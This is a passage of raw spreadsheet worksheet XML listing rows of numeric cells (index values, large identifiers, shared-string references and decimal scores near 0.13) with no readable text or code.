        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25735" ht="15.75" customHeight="1">
      <c r="A25735" s="1">
        <v>22790.0</v>
      </c>
      <c r="B25735" s="2">
        <v>4.5447414E7</v>
      </c>
      <c r="C25735" s="2" t="s">
        <v>24748</v>
      </c>
      <c r="D25735" s="2">
        <v>1.0</v>
      </c>
      <c r="E25735" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25735" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25736" ht="15.75" customHeight="1">
      <c r="A25736" s="1">
        <v>22871.0</v>
      </c>
      <c r="B25736" s="2">
        <v>4.7481605E7</v>
      </c>
      <c r="C25736" s="2" t="s">
        <v>24749</v>
      </c>
      <c r="D25736" s="2">
        <v>1.0</v>
      </c>
      <c r="E25736" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25736" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25737" ht="15.75" customHeight="1">
      <c r="A25737" s="1">
        <v>22874.0</v>
      </c>
      <c r="B25737" s="2">
        <v>4.7481651E7</v>
      </c>
      <c r="C25737" s="2" t="s">
        <v>24749</v>
      </c>
      <c r="D25737" s="2">
        <v>1.0</v>
      </c>
      <c r="E25737" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25737" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25738" ht="15.75" customHeight="1">
      <c r="A25738" s="1">
        <v>23001.0</v>
      </c>
      <c r="B25738" s="2">
        <v>4.9736153E7</v>
      </c>
      <c r="C25738" s="2" t="s">
        <v>24750</v>
      </c>
      <c r="D25738" s="2">
        <v>1.0</v>
      </c>
      <c r="E25738" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25738" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25739" ht="15.75" customHeight="1">
      <c r="A25739" s="1">
        <v>23111.0</v>
      </c>
      <c r="B25739" s="2">
        <v>5.114652E7</v>
      </c>
      <c r="C25739" s="2" t="s">
        <v>24751</v>
      </c>
      <c r="D25739" s="2">
        <v>1.0</v>
      </c>
      <c r="E25739" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25739" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25740" ht="15.75" customHeight="1">
      <c r="A25740" s="1">
        <v>23174.0</v>
      </c>
      <c r="B25740" s="2">
        <v>5.2136694E7</v>
      </c>
      <c r="C25740" s="2" t="s">
        <v>24752</v>
      </c>
      <c r="D25740" s="2">
        <v>1.0</v>
      </c>
      <c r="E25740" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25740" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25741" ht="15.75" customHeight="1">
      <c r="A25741" s="1">
        <v>23198.0</v>
      </c>
      <c r="B25741" s="2">
        <v>5.2458213E7</v>
      </c>
      <c r="C25741" s="2" t="s">
        <v>24753</v>
      </c>
      <c r="D25741" s="2">
        <v>1.0</v>
      </c>
      <c r="E25741" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25741" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25742" ht="15.75" customHeight="1">
      <c r="A25742" s="1">
        <v>24157.0</v>
      </c>
      <c r="B25742" s="2">
        <v>1.0133742E7</v>
      </c>
      <c r="C25742" s="2" t="s">
        <v>24754</v>
      </c>
      <c r="D25742" s="2">
        <v>1.0</v>
      </c>
      <c r="E25742" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25742" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25743" ht="15.75" customHeight="1">
      <c r="A25743" s="1">
        <v>25106.0</v>
      </c>
      <c r="B25743" s="2">
        <v>1.2956857E7</v>
      </c>
      <c r="C25743" s="2" t="s">
        <v>24755</v>
      </c>
      <c r="D25743" s="2">
        <v>1.0</v>
      </c>
      <c r="E25743" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25743" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25744" ht="15.75" customHeight="1">
      <c r="A25744" s="1">
        <v>27222.0</v>
      </c>
      <c r="B25744" s="2">
        <v>2.0974162E7</v>
      </c>
      <c r="C25744" s="2" t="s">
        <v>24756</v>
      </c>
      <c r="D25744" s="2">
        <v>1.0</v>
      </c>
      <c r="E25744" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25744" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25745" ht="15.75" customHeight="1">
      <c r="A25745" s="1">
        <v>27406.0</v>
      </c>
      <c r="B25745" s="2">
        <v>2.1803528E7</v>
      </c>
      <c r="C25745" s="2" t="s">
        <v>24757</v>
      </c>
      <c r="D25745" s="2">
        <v>1.0</v>
      </c>
      <c r="E25745" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25745" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25746" ht="15.75" customHeight="1">
      <c r="A25746" s="1">
        <v>27742.0</v>
      </c>
      <c r="B25746" s="2">
        <v>2.3081303E7</v>
      </c>
      <c r="C25746" s="2" t="s">
        <v>24758</v>
      </c>
      <c r="D25746" s="2">
        <v>1.0</v>
      </c>
      <c r="E25746" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25746" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25747" ht="15.75" customHeight="1">
      <c r="A25747" s="1">
        <v>28006.0</v>
      </c>
      <c r="B25747" s="2">
        <v>2.4335313E7</v>
      </c>
      <c r="C25747" s="2" t="s">
        <v>24759</v>
      </c>
      <c r="D25747" s="2">
        <v>1.0</v>
      </c>
      <c r="E25747" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25747" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25748" ht="15.75" customHeight="1">
      <c r="A25748" s="1">
        <v>30807.0</v>
      </c>
      <c r="B25748" s="2">
        <v>4.5265318E7</v>
      </c>
      <c r="C25748" s="2" t="s">
        <v>24760</v>
      </c>
      <c r="D25748" s="2">
        <v>1.0</v>
      </c>
      <c r="E25748" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25748" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25749" ht="15.75" customHeight="1">
      <c r="A25749" s="1">
        <v>31390.0</v>
      </c>
      <c r="B25749" s="2">
        <v>4998403.0</v>
      </c>
      <c r="C25749" s="2" t="s">
        <v>24761</v>
      </c>
      <c r="D25749" s="2">
        <v>1.0</v>
      </c>
      <c r="E25749" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25749" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25750" ht="15.75" customHeight="1">
      <c r="A25750" s="1">
        <v>31805.0</v>
      </c>
      <c r="B25750" s="2">
        <v>5245934.0</v>
      </c>
      <c r="C25750" s="2" t="s">
        <v>24762</v>
      </c>
      <c r="D25750" s="2">
        <v>1.0</v>
      </c>
      <c r="E25750" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25750" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25751" ht="15.75" customHeight="1">
      <c r="A25751" s="1">
        <v>34013.0</v>
      </c>
      <c r="B25751" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C25751" s="2" t="s">
        <v>24763</v>
      </c>
      <c r="D25751" s="2">
        <v>1.0</v>
      </c>
      <c r="E25751" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25751" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25752" ht="15.75" customHeight="1">
      <c r="A25752" s="1">
        <v>21655.0</v>
      </c>
      <c r="B25752" s="2">
        <v>2.4939973E7</v>
      </c>
      <c r="C25752" s="2" t="s">
        <v>24764</v>
      </c>
      <c r="D25752" s="2">
        <v>1.0</v>
      </c>
      <c r="E25752" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25752" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="25753" ht="15.75" customHeight="1">
      <c r="A25753" s="1">
        <v>3275.0</v>
      </c>
      <c r="B25753" s="2">
        <v>3.7486296E7</v>
      </c>
      <c r="C25753" s="2" t="s">
        <v>24765</v>
      </c>
      <c r="D25753" s="2">
        <v>1.0</v>
      </c>
      <c r="E25753" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25753" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="25754" ht="15.75" customHeight="1">
      <c r="A25754" s="1">
        <v>5918.0</v>
      </c>
      <c r="B25754" s="2">
        <v>4.7211545E7</v>
      </c>
      <c r="C25754" s="2" t="s">
        <v>24766</v>
      </c>
      <c r="D25754" s="2">
        <v>1.0</v>
      </c>
      <c r="E25754" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25754" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="25755" ht="15.75" customHeight="1">
      <c r="A25755" s="1">
        <v>24745.0</v>
      </c>
      <c r="B25755" s="2">
        <v>1.1804199E7</v>
      </c>
      <c r="C25755" s="2" t="s">
        <v>24767</v>
      </c>
      <c r="D25755" s="2">
        <v>1.0</v>
      </c>
      <c r="E25755" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25755" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="25756" ht="15.75" customHeight="1">
      <c r="A25756" s="1">
        <v>27384.0</v>
      </c>
      <c r="B25756" s="2">
        <v>2.1751555E7</v>
      </c>
      <c r="C25756" s="2" t="s">
        <v>24768</v>
      </c>
      <c r="D25756" s="2">
        <v>1.0</v>
      </c>
      <c r="E25756" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25756" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="25757" ht="15.75" customHeight="1">
      <c r="A25757" s="1">
        <v>20486.0</v>
      </c>
      <c r="B25757" s="2">
        <v>1.2866303E7</v>
      </c>
      <c r="C25757" s="2" t="s">
        <v>24769</v>
      </c>
      <c r="D25757" s="2">
        <v>1.0</v>
      </c>
      <c r="E25757" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25757" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="25758" ht="15.75" customHeight="1">
      <c r="A25758" s="1">
        <v>2767.0</v>
      </c>
      <c r="B25758" s="2">
        <v>3.511115E7</v>
      </c>
      <c r="C25758" s="2" t="s">
        <v>24770</v>
      </c>
      <c r="D25758" s="2">
        <v>1.0</v>
      </c>
      <c r="E25758" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25758" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25759" ht="15.75" customHeight="1">
      <c r="A25759" s="1">
        <v>3777.0</v>
      </c>
      <c r="B25759" s="2">
        <v>3.9908068E7</v>
      </c>
      <c r="C25759" s="2" t="s">
        <v>24771</v>
      </c>
      <c r="D25759" s="2">
        <v>1.0</v>
      </c>
      <c r="E25759" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25759" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25760" ht="15.75" customHeight="1">
      <c r="A25760" s="1">
        <v>7523.0</v>
      </c>
      <c r="B25760" s="2">
        <v>5.1416987E7</v>
      </c>
      <c r="C25760" s="2" t="s">
        <v>24772</v>
      </c>
      <c r="D25760" s="2">
        <v>1.0</v>
      </c>
      <c r="E25760" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25760" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25761" ht="15.75" customHeight="1">
      <c r="A25761" s="1">
        <v>7805.0</v>
      </c>
      <c r="B25761" s="2">
        <v>5.2233742E7</v>
      </c>
      <c r="C25761" s="2" t="s">
        <v>24773</v>
      </c>
      <c r="D25761" s="2">
        <v>1.0</v>
      </c>
      <c r="E25761" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25761" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25762" ht="15.75" customHeight="1">
      <c r="A25762" s="1">
        <v>17495.0</v>
      </c>
      <c r="B25762" s="2">
        <v>4.9997422E7</v>
      </c>
      <c r="C25762" s="2" t="s">
        <v>24774</v>
      </c>
      <c r="D25762" s="2">
        <v>1.0</v>
      </c>
      <c r="E25762" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25762" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25763" ht="15.75" customHeight="1">
      <c r="A25763" s="1">
        <v>22140.0</v>
      </c>
      <c r="B25763" s="2">
        <v>3.1136365E7</v>
      </c>
      <c r="C25763" s="2" t="s">
        <v>24775</v>
      </c>
      <c r="D25763" s="2">
        <v>1.0</v>
      </c>
      <c r="E25763" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25763" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25764" ht="15.75" customHeight="1">
      <c r="A25764" s="1">
        <v>23460.0</v>
      </c>
      <c r="B25764" s="2">
        <v>5.6981574E7</v>
      </c>
      <c r="C25764" s="2" t="s">
        <v>24776</v>
      </c>
      <c r="D25764" s="2">
        <v>1.0</v>
      </c>
      <c r="E25764" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25764" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25765" ht="15.75" customHeight="1">
      <c r="A25765" s="1">
        <v>24657.0</v>
      </c>
      <c r="B25765" s="2">
        <v>1.1521815E7</v>
      </c>
      <c r="C25765" s="2" t="s">
        <v>24777</v>
      </c>
      <c r="D25765" s="2">
        <v>1.0</v>
      </c>
      <c r="E25765" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25765" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25766" ht="15.75" customHeight="1">
      <c r="A25766" s="1">
        <v>28304.0</v>
      </c>
      <c r="B25766" s="2">
        <v>2.5646798E7</v>
      </c>
      <c r="C25766" s="2" t="s">
        <v>24778</v>
      </c>
      <c r="D25766" s="2">
        <v>1.0</v>
      </c>
      <c r="E25766" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25766" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25767" ht="15.75" customHeight="1">
      <c r="A25767" s="1">
        <v>28391.0</v>
      </c>
      <c r="B25767" s="2">
        <v>2.6168326E7</v>
      </c>
      <c r="C25767" s="2" t="s">
        <v>24779</v>
      </c>
      <c r="D25767" s="2">
        <v>1.0</v>
      </c>
      <c r="E25767" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25767" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25768" ht="15.75" customHeight="1">
      <c r="A25768" s="1">
        <v>29229.0</v>
      </c>
      <c r="B25768" s="2">
        <v>3.0827792E7</v>
      </c>
      <c r="C25768" s="2" t="s">
        <v>24780</v>
      </c>
      <c r="D25768" s="2">
        <v>1.0</v>
      </c>
      <c r="E25768" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25768" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25769" ht="15.75" customHeight="1">
      <c r="A25769" s="1">
        <v>30330.0</v>
      </c>
      <c r="B25769" s="2">
        <v>3812352.0</v>
      </c>
      <c r="C25769" s="2" t="s">
        <v>24781</v>
      </c>
      <c r="D25769" s="2">
        <v>1.0</v>
      </c>
      <c r="E25769" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25769" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25770" ht="15.75" customHeight="1">
      <c r="A25770" s="1">
        <v>31759.0</v>
      </c>
      <c r="B25770" s="2">
        <v>5.2155161E7</v>
      </c>
      <c r="C25770" s="2" t="s">
        <v>24782</v>
      </c>
      <c r="D25770" s="2">
        <v>1.0</v>
      </c>
      <c r="E25770" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25770" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25771" ht="15.75" customHeight="1">
      <c r="A25771" s="1">
        <v>32434.0</v>
      </c>
      <c r="B25771" s="2">
        <v>5655084.0</v>
      </c>
      <c r="C25771" s="2" t="s">
        <v>24783</v>
      </c>
      <c r="D25771" s="2">
        <v>1.0</v>
      </c>
      <c r="E25771" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25771" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25772" ht="15.75" customHeight="1">
      <c r="A25772" s="1">
        <v>32990.0</v>
      </c>
      <c r="B25772" s="2">
        <v>6603805.0</v>
      </c>
      <c r="C25772" s="2" t="s">
        <v>24784</v>
      </c>
      <c r="D25772" s="2">
        <v>1.0</v>
      </c>
      <c r="E25772" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25772" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="25773" ht="15.75" customHeight="1">
      <c r="A25773" s="1">
        <v>21196.0</v>
      </c>
      <c r="B25773" s="2">
        <v>1.9427157E7</v>
      </c>
      <c r="C25773" s="2" t="s">
        <v>24785</v>
      </c>
      <c r="D25773" s="2">
        <v>1.0</v>
      </c>
      <c r="E25773" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25773" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="25774" ht="15.75" customHeight="1">
      <c r="A25774" s="1">
        <v>26748.0</v>
      </c>
      <c r="B25774" s="2">
        <v>1.8346516E7</v>
      </c>
      <c r="C25774" s="2" t="s">
        <v>24786</v>
      </c>
      <c r="D25774" s="2">
        <v>1.0</v>
      </c>
      <c r="E25774" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25774" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="25775" ht="15.75" customHeight="1">
      <c r="A25775" s="1">
        <v>6157.0</v>
      </c>
      <c r="B25775" s="2">
        <v>4.7862066E7</v>
      </c>
      <c r="C25775" s="2" t="s">
        <v>24787</v>
      </c>
      <c r="D25775" s="2">
        <v>1.0</v>
      </c>
      <c r="E25775" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25775" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="25776" ht="15.75" customHeight="1">
      <c r="A25776" s="1">
        <v>20188.0</v>
      </c>
      <c r="B25776" s="2">
        <v>1.0504696E7</v>
      </c>
      <c r="C25776" s="2" t="s">
        <v>24788</v>
      </c>
      <c r="D25776" s="2">
        <v>1.0</v>
      </c>
      <c r="E25776" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25776" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="25777" ht="15.75" customHeight="1">
      <c r="A25777" s="1">
        <v>34081.0</v>
      </c>
      <c r="B25777" s="2">
        <v>9679980.0</v>
      </c>
      <c r="C25777" s="2" t="s">
        <v>24789</v>
      </c>
      <c r="D25777" s="2">
        <v>1.0</v>
      </c>
      <c r="E25777" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25777" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="25778" ht="15.75" customHeight="1">
      <c r="A25778" s="1">
        <v>7441.0</v>
      </c>
      <c r="B25778" s="2">
        <v>5.12178E7</v>
      </c>
      <c r="C25778" s="2" t="s">
        <v>24790</v>
      </c>
      <c r="D25778" s="2">
        <v>1.0</v>
      </c>
      <c r="E25778" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25778" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="25779" ht="15.75" customHeight="1">
      <c r="A25779" s="1">
        <v>20431.0</v>
      </c>
      <c r="B25779" s="2">
        <v>1.2328477E7</v>
      </c>
      <c r="C25779" s="2" t="s">
        <v>24791</v>
      </c>
      <c r="D25779" s="2">
        <v>1.0</v>
      </c>
      <c r="E25779" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25779" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="25780" ht="15.75" customHeight="1">
      <c r="A25780" s="1">
        <v>12127.0</v>
      </c>
      <c r="B25780" s="2">
        <v>2.6938194E7</v>
      </c>
      <c r="C25780" s="2" t="s">
        <v>24792</v>
      </c>
      <c r="D25780" s="2">
        <v>1.0</v>
      </c>
      <c r="E25780" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25780" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="25781" ht="15.75" customHeight="1">
      <c r="A25781" s="1">
        <v>15661.0</v>
      </c>
      <c r="B25781" s="2">
        <v>4.369433E7</v>
      </c>
      <c r="C25781" s="2" t="s">
        <v>24793</v>
      </c>
      <c r="D25781" s="2">
        <v>1.0</v>
      </c>
      <c r="E25781" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25781" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="25782" ht="15.75" customHeight="1">
      <c r="A25782" s="1">
        <v>23159.0</v>
      </c>
      <c r="B25782" s="2">
        <v>5192461.0</v>
      </c>
      <c r="C25782" s="2" t="s">
        <v>24794</v>
      </c>
      <c r="D25782" s="2">
        <v>1.0</v>
      </c>
      <c r="E25782" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25782" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="25783" ht="15.75" customHeight="1">
      <c r="A25783" s="1">
        <v>28484.0</v>
      </c>
      <c r="B25783" s="2">
        <v>2.6668428E7</v>
      </c>
      <c r="C25783" s="2" t="s">
        <v>24795</v>
      </c>
      <c r="D25783" s="2">
        <v>1.0</v>
      </c>
      <c r="E25783" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25783" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="25784" ht="15.75" customHeight="1">
      <c r="A25784" s="1">
        <v>13595.0</v>
      </c>
      <c r="B25784" s="2">
        <v>3.5775252E7</v>
      </c>
      <c r="C25784" s="2" t="s">
        <v>24796</v>
      </c>
      <c r="D25784" s="2">
        <v>1.0</v>
      </c>
      <c r="E25784" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25784" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="25785" ht="15.75" customHeight="1">
      <c r="A25785" s="1">
        <v>28244.0</v>
      </c>
      <c r="B25785" s="2">
        <v>2.5226602E7</v>
      </c>
      <c r="C25785" s="2" t="s">
        <v>24797</v>
      </c>
      <c r="D25785" s="2">
        <v>1.0</v>
      </c>
      <c r="E25785" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25785" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="25786" ht="15.75" customHeight="1">
      <c r="A25786" s="1">
        <v>25662.0</v>
      </c>
      <c r="B25786" s="2">
        <v>1.4523281E7</v>
      </c>
      <c r="C25786" s="2" t="s">
        <v>24798</v>
      </c>
      <c r="D25786" s="2">
        <v>1.0</v>
      </c>
      <c r="E25786" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25786" s="2">
        <v>0.1304713804713805</v>
      </c>
    </row>
    <row r="25787" ht="15.75" customHeight="1">
      <c r="A25787" s="1">
        <v>265.0</v>
      </c>
      <c r="B25787" s="2">
        <v>1.5165212E7</v>
      </c>
      <c r="C25787" s="2" t="s">
        <v>24799</v>
      </c>
      <c r="D25787" s="2">
        <v>1.0</v>
      </c>
      <c r="E25787" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25787" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25788" ht="15.75" customHeight="1">
      <c r="A25788" s="1">
        <v>723.0</v>
      </c>
      <c r="B25788" s="2">
        <v>2.0755142E7</v>
      </c>
      <c r="C25788" s="2" t="s">
        <v>24800</v>
      </c>
      <c r="D25788" s="2">
        <v>1.0</v>
      </c>
      <c r="E25788" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25788" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25789" ht="15.75" customHeight="1">
      <c r="A25789" s="1">
        <v>969.0</v>
      </c>
      <c r="B25789" s="2">
        <v>2.2748309E7</v>
      </c>
      <c r="C25789" s="2" t="s">
        <v>24801</v>
      </c>
      <c r="D25789" s="2">
        <v>1.0</v>
      </c>
      <c r="E25789" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25789" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25790" ht="15.75" customHeight="1">
      <c r="A25790" s="1">
        <v>1411.0</v>
      </c>
      <c r="B25790" s="2">
        <v>2.6455199E7</v>
      </c>
      <c r="C25790" s="2" t="s">
        <v>24802</v>
      </c>
      <c r="D25790" s="2">
        <v>1.0</v>
      </c>
      <c r="E25790" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25790" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25791" ht="15.75" customHeight="1">
      <c r="A25791" s="1">
        <v>3332.0</v>
      </c>
      <c r="B25791" s="2">
        <v>3.7688001E7</v>
      </c>
      <c r="C25791" s="2" t="s">
        <v>24803</v>
      </c>
      <c r="D25791" s="2">
        <v>1.0</v>
      </c>
      <c r="E25791" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25791" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25792" ht="15.75" customHeight="1">
      <c r="A25792" s="1">
        <v>5940.0</v>
      </c>
      <c r="B25792" s="2">
        <v>4.7277072E7</v>
      </c>
      <c r="C25792" s="2" t="s">
        <v>24804</v>
      </c>
      <c r="D25792" s="2">
        <v>1.0</v>
      </c>
      <c r="E25792" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25792" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25793" ht="15.75" customHeight="1">
      <c r="A25793" s="1">
        <v>6063.0</v>
      </c>
      <c r="B25793" s="2">
        <v>4.7623346E7</v>
      </c>
      <c r="C25793" s="2" t="s">
        <v>24805</v>
      </c>
      <c r="D25793" s="2">
        <v>1.0</v>
      </c>
      <c r="E25793" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25793" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25794" ht="15.75" customHeight="1">
      <c r="A25794" s="1">
        <v>6956.0</v>
      </c>
      <c r="B25794" s="2">
        <v>4.9973199E7</v>
      </c>
      <c r="C25794" s="2" t="s">
        <v>24806</v>
      </c>
      <c r="D25794" s="2">
        <v>1.0</v>
      </c>
      <c r="E25794" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25794" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25795" ht="15.75" customHeight="1">
      <c r="A25795" s="1">
        <v>6960.0</v>
      </c>
      <c r="B25795" s="2">
        <v>4.9979785E7</v>
      </c>
      <c r="C25795" s="2" t="s">
        <v>24807</v>
      </c>
      <c r="D25795" s="2">
        <v>1.0</v>
      </c>
      <c r="E25795" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25795" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25796" ht="15.75" customHeight="1">
      <c r="A25796" s="1">
        <v>9942.0</v>
      </c>
      <c r="B25796" s="2">
        <v>5.6873261E7</v>
      </c>
      <c r="C25796" s="2" t="s">
        <v>24808</v>
      </c>
      <c r="D25796" s="2">
        <v>1.0</v>
      </c>
      <c r="E25796" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25796" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25797" ht="15.75" customHeight="1">
      <c r="A25797" s="1">
        <v>11919.0</v>
      </c>
      <c r="B25797" s="2">
        <v>2.5319921E7</v>
      </c>
      <c r="C25797" s="2" t="s">
        <v>24809</v>
      </c>
      <c r="D25797" s="2">
        <v>1.0</v>
      </c>
      <c r="E25797" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25797" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25798" ht="15.75" customHeight="1">
      <c r="A25798" s="1">
        <v>14672.0</v>
      </c>
      <c r="B25798" s="2">
        <v>4.045512E7</v>
      </c>
      <c r="C25798" s="2" t="s">
        <v>24810</v>
      </c>
      <c r="D25798" s="2">
        <v>1.0</v>
      </c>
      <c r="E25798" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25798" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25799" ht="15.75" customHeight="1">
      <c r="A25799" s="1">
        <v>16645.0</v>
      </c>
      <c r="B25799" s="2">
        <v>4.7166379E7</v>
      </c>
      <c r="C25799" s="2" t="s">
        <v>24811</v>
      </c>
      <c r="D25799" s="2">
        <v>1.0</v>
      </c>
      <c r="E25799" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25799" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25800" ht="15.75" customHeight="1">
      <c r="A25800" s="1">
        <v>18872.0</v>
      </c>
      <c r="B25800" s="2">
        <v>5.4053276E7</v>
      </c>
      <c r="C25800" s="2" t="s">
        <v>24812</v>
      </c>
      <c r="D25800" s="2">
        <v>1.0</v>
      </c>
      <c r="E25800" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25800" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25801" ht="15.75" customHeight="1">
      <c r="A25801" s="1">
        <v>20599.0</v>
      </c>
      <c r="B25801" s="2">
        <v>1.3850835E7</v>
      </c>
      <c r="C25801" s="2" t="s">
        <v>24813</v>
      </c>
      <c r="D25801" s="2">
        <v>1.0</v>
      </c>
      <c r="E25801" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25801" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
